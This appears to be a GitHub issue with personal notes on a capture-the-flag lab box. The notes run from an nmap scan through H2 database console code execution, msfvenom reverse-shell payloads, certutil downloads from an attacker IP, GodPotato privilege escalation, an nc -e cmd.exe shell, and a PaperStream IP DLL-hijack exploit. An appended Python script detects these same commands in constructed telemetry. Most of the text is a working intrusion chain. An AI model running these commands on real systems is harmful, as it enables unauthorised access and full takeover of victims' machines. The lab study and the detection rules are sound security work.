WDavid404 opened 3 months ago
```
PORT      STATE SERVICE        REASON          VERSION
80/tcp    open  http           syn-ack ttl 125 Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: H2 Database Engine (redirect)
135/tcp   open  msrpc          syn-ack ttl 125 Microsoft Windows RPC
139/tcp   open  netbios-ssn    syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?  syn-ack ttl 125
5040/tcp  open  unknown        syn-ack ttl 125
8082/tcp  open  http           syn-ack ttl 125 H2 database http console
| http-methods:
|_  Supported Methods: GET POST
|_http-favicon: Unknown favicon MD5: D2FBC2E4FB758DC8672CDEFB4D924540
|_http-title: H2 Console
9092/tcp  open  XmlIpcRegSvc?  syn-ack ttl 125
49664/tcp open  msrpc          syn-ack ttl 125 Microsoft Windows RPC
49665/tcp open  msrpc          syn-ack ttl 125 Microsoft Windows RPC
49666/tcp open  msrpc          syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open  msrpc          syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open  msrpc          syn-ack ttl 125 Microsoft Windows RPC
49669/tcp open  msrpc          syn-ack ttl 125 Microsoft Windows RPC
```
445/tcp --> no useful info.
80/tcp
8082/tcp --> can log in as "sa" without a password
search exploit for h2 1.4.199 exploit -->
Based on the instructions in the exploit,
```
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("whoami").getInputStream()).useDelimiter("\\Z").next()');
```
works!
[kali]
```
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.205 LPORT=4444 -f exe > rev.exe
```
[sql]
```
certutil -urlcache -f http://192.168.45.205/rev.exe c:/users/public/downloads/rev.exe
c:/users/public/downloads/rev.exe
```
--> got a reverse shell
whoami --> 'whoami' is not recognized as an internal or external command, operable program or batch file.
But if we execute whoami in c:/windows/system32 --> it works!
```
echo %PATH%
set PATH=%PATH%;C:\windows\system32;C:\windows;C:\windows\System32\Wbem;C:\windows\System32\WindowsPowerShell\v1.0\;C:\windows\System32\OpenSSH\;C:\Program Files\dotnet\
whoami /priv
```
```
certutil -urlcache -f http://192.168.45.205/PrintSpoofer64.exe c:/users/public/downloads/PrintSpoofer64.exe
c:/users/public/downloads/PrintSpoofer64.exe -i -c powershell.exe
```
--> failed
powershell --> `Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP' -Recurse` --> .NET is 4.0 --> we can use GodPotato-NET4.exe
[kali]
```
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.205 LPORT=5555 -f exe > rev2.exe
```
```
certutil -urlcache -f http://192.168.45.205/GodPotato.exe c:/users/public/downloads/GodPotato.exe
certutil -urlcache -f http://192.168.45.205/rev2.exe c:/users/public/downloads/rev2.exe
c:/users/public/downloads/GodPotato.exe -cmd " c:/users/public/downloads/rev2.exe"
```
--> But failed...
```
certutil -urlcache -f http://192.168.45.205/nc64.exe c:/users/public/downloads/nc.exe
.\godpotato.exe -cmd "nc.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.205 9001"
```
## Note: -t flag: This makes it possible to use nc to script telnet sessions.
---> work!
C:\Program Files (x86)\fiScanner (see: https://benheater.com/proving-grounds-jacko/)
C:\Program Files (x86)\PaperStream IP --> PaperStream IP version is 1.42 --> PaperStream IP (TWAIN) 1.42.0.5685 - Local Privilege Escalation
[kali]
```
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.205 LPORT=80 -f dll -o UninOldIS.dll
```
```
certutil -urlcache -f http://192.168.45.205/UninOldIS.dll c:/users/public/downloads/UninOldIS.dll
certutil -urlcache -f http://192.168.45.205/49382.ps1 c:/users/public/downloads/49382.ps1
```
[Powershell]
```
Set-ExecutionPolicy -ExecutionPolicy ByPass -Scope CurrentUser
cp UninOldIS.dll c:/windows/temp/UninOldIS.dll
./49382.ps1
```
Keypoints:
```
set PATH=%PATH%;C:\windows\system32;C:\windows;C:\windows\System32\Wbem;C:\windows\System32\WindowsPowerShell\v1.0\;C:\windows\System32\OpenSSH\;C:\Program Files\dotnet\
echo %PATH%
```
--> confirm PATH variable
```
Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP' -Recurse
```
```
.\godpotato.exe -cmd "nc.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.205 9001"
```
(nc -t: communicate using the telnet protocol)
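Defender-side counterpart to the chain in these notes, as an added example (not part of the original issue): a small rule set run over constructed process-creation events that flags the certutil download, the nc -e shell hand-off, and an OS command spawned directly by the H2 java.exe process. The event field names, the H2 install path and all sample events are assumptions constructed for the example.

```python
"""Flag the post-exploitation command lines from these notes in process-creation
telemetry (Sysmon Event ID 1 / Security 4688 style). Added example: the event
shape, field names and the H2 java.exe path are assumptions, and every sample
event below is constructed."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


# Rule name -> predicate over a ProcEvent; each rule maps to one step of the chain above.
RULES = {
    # certutil -urlcache -f http://... <dest>: LOLBin download to disk
    "certutil download to disk": lambda e: _basename(e.image) == "certutil.exe"
    and "-urlcache" in e.command_line.lower()
    and re.search(r"https?://", e.command_line, re.I) is not None,
    # nc.exe -e cmd.exe <ip> <port>: netcat handing a shell to a remote host
    "netcat spawning a shell": lambda e: re.search(r"\bnc(64)?\.exe\b", e.command_line, re.I) is not None
    and re.search(r"\s-e\s+\S*cmd\.exe", e.command_line, re.I) is not None,
    # The H2 JVM should never exec an OS shell or whoami (Runtime.exec from the console)
    "OS command spawned by H2 java.exe": lambda e: _basename(e.parent_image) == "java.exe"
    and _basename(e.image) in {"cmd.exe", "powershell.exe", "whoami.exe", "certutil.exe"},
}


def detect(events):
    """Return [(rule_name, command_line)] for every event matching a rule."""
    return [(name, e.command_line) for e in events for name, pred in RULES.items() if pred(e)]


# Constructed sample telemetry modelled on the commands in the notes; the last
# event is a benign certutil use that must not fire.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files\H2\jre\bin\java.exe", r"C:\Windows\System32\whoami.exe", "whoami"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\certutil.exe",
              "certutil -urlcache -f http://192.168.45.205/rev.exe c:/users/public/downloads/rev.exe"),
    ProcEvent(r"C:\Users\Public\Downloads\godpotato.exe", r"C:\Users\Public\Downloads\nc.exe",
              r"nc.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.205 9001"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\certutil.exe",
              r"certutil -hashfile C:\setup.msi SHA256"),
]

if __name__ == "__main__":
    for name, cmd in detect(SAMPLE_EVENTS):
        print(f"[{name}] {cmd}")
```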